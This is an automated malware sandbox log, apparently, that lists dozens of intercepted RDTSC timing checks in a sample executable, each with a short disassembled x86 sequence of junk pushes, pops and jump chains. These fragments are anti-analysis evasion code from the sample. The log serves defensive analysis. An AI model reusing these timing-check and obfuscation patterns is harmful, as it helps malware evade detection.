Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 978AB2 second address: 978AF8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jl 00007F5F64D1DF55h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jne 00007F5F64D1DF16h 0x0000001a pushad 0x0000001b popad 0x0000001c jo 00007F5F64D1DF16h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F5F64D1DF1Eh 0x0000002a jmp 00007F5F64D1DF23h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 978AF8 second address: 978AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8A4D1E second address: 8A4D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5F64D1DF29h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 97A6CC second address: 97A6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 97A6D2 second address: 97A6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5F64D1DF1Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 97A837 second address: 97A83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 97A83B second address: 97A855 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a jmp 00007F5F64D1DF1Dh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 984CCE second address: 984CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 98A35C second address: 98A385 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5F64D1DF16h 0x00000008 jmp 00007F5F64D1DF21h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F5F64D1DF1Eh 0x00000015 pushad 0x00000016 popad 0x00000017 jng 00007F5F64D1DF16h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9932EC second address: 993306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993306 second address: 993359 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF24h 0x00000007 jmp 00007F5F64D1DF1Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edi 0x00000010 jng 00007F5F64D1DF16h 0x00000016 jmp 00007F5F64D1DF20h 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F5F64D1DF1Fh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993644 second address: 993663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5F64D1DAC7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993663 second address: 993668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993668 second address: 99366E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99366E second address: 993674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993674 second address: 99367A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99367A second address: 993684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993684 second address: 99369D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DAC5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9947AA second address: 9947D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007F5F64D1DF16h 0x0000000f jmp 00007F5F64D1DF25h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99823F second address: 998244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 998244 second address: 998280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF23h 0x00000007 jbe 00007F5F64D1DF18h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jbe 00007F5F64D1DF32h 0x00000017 pushad 0x00000018 jmp 00007F5F64D1DF24h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 997E1C second address: 997E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 997E22 second address: 997E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99C07A second address: 99C07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99C07E second address: 99C082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99D7EF second address: 99D7F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99D7F7 second address: 99D7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99D7FB second address: 99D7FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9A9E72 second address: 9A9E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5F64D1DF24h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA750 second address: 9BA75E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F5F64D1DAB6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA75E second address: 9BA78C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Ch 0x00000007 jmp 00007F5F64D1DF28h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA78C second address: 9BA792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA792 second address: 9BA79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA79A second address: 9BA7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5F64D1DABBh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA7AA second address: 9BA7C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DF24h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA483 second address: 9BA4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC7h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D34B1 second address: 9D34B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D2F42 second address: 9D2F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D2F48 second address: 9D2F5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D2F5A second address: 9D2F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a jl 00007F5F64D1DAE8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D30F8 second address: 9D3102 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D3102 second address: 9D3108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D3108 second address: 9D310C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D77EC second address: 9D77F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F5F64D1DAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D7AFE second address: 9D7B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D7B06 second address: 9D7B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F5F64D1DAC5h 0x0000000e push dword ptr [ebp+122D1961h] 0x00000014 jmp 00007F5F64D1DAC8h 0x00000019 push 50C08115h 0x0000001e push ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D7B4B second address: 9D7B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D9412 second address: 9D9418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D9418 second address: 9D941C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D941C second address: 9D9436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5F64D1DAC2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D8F9A second address: 9D8F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 503001D second address: 5030022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5030022 second address: 5030031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5030031 second address: 503008F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F5F64D1DAC1h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 jmp 00007F5F64D1DABCh 0x00000018 mov edx, eax 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F5F64D1DAC6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 503008F second address: 5030093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5030093 second address: 5030099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5030099 second address: 50300D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5F64D1DF1Dh 0x00000013 sbb ecx, 29E53286h 0x00000019 jmp 00007F5F64D1DF21h 0x0000001e popfd 0x0000001f mov dx, cx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50300D9 second address: 50300F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50300F5 second address: 50300F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010F70 second address: 5010F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DABDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010F9D second address: 5010FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010FA3 second address: 5010FA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5060136 second address: 5060169 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cl, bh 0x00000011 call 00007F5F64D1DF24h 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5060169 second address: 506016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 506016F second address: 5060173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF01A3 second address: 4FF01B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DABEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF01B5 second address: 4FF01F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F5F64D1DF27h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5F64D1DF25h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF01F0 second address: 4FF0200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DABCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0200 second address: 4FF0217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5F64D1DF1Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010C6D second address: 5010CB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007F5F64D1DAC3h 0x0000000c sub si, 6C3Eh 0x00000011 jmp 00007F5F64D1DAC9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5F64D1DABAh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010CB7 second address: 5010D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F5F64D1DF22h 0x0000000f or al, FFFFFF98h 0x00000012 jmp 00007F5F64D1DF1Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c call 00007F5F64D1DF24h 0x00000021 mov cx, AAD1h 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 call 00007F5F64D1DF1Dh 0x0000002d pop eax 0x0000002e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D1C second address: 5010D2A instructions: 0x00000000 rdtsc 0x00000002 mov dh, 83h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D2A second address: 5010D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D2E second address: 5010D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D32 second address: 5010D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D38 second address: 5010D3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D3E second address: 5010D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D42 second address: 5010D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50107C0 second address: 50107C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50107C6 second address: 50107FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5F64D1DAC7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50107FA second address: 50107FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50107FF second address: 501084D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F5F64D1DAC5h 0x0000000a adc esi, 46A16D36h 0x00000010 jmp 00007F5F64D1DAC1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov ecx, edi 0x0000001d call 00007F5F64D1DAC3h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 501084D second address: 501087E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5F64D1DF1Eh 0x00000010 jmp 00007F5F64D1DF25h 0x00000015 popfd 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 501087E second address: 5010883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50106A2 second address: 50106E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5F64D1DF21h 0x00000009 sub cl, FFFFFFD6h 0x0000000c jmp 00007F5F64D1DF21h 0x00000011 popfd 0x00000012 mov bh, ch 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5F64D1DF1Fh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50106E3 second address: 501070A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov ax, 5A27h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 jmp 00007F5F64D1DABAh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ebx, 79118370h 0x0000001f push ebx 0x00000020 pop eax 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 501070A second address: 5010747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5F64D1DF20h 0x00000009 or cl, FFFFFFB8h 0x0000000c jmp 00007F5F64D1DF1Bh 0x00000011 popfd 0x00000012 mov di, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5F64D1DF21h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010747 second address: 5010784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5F64D1DAC7h 0x00000009 add esi, 4D377ADEh 0x0000000f jmp 00007F5F64D1DAC9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
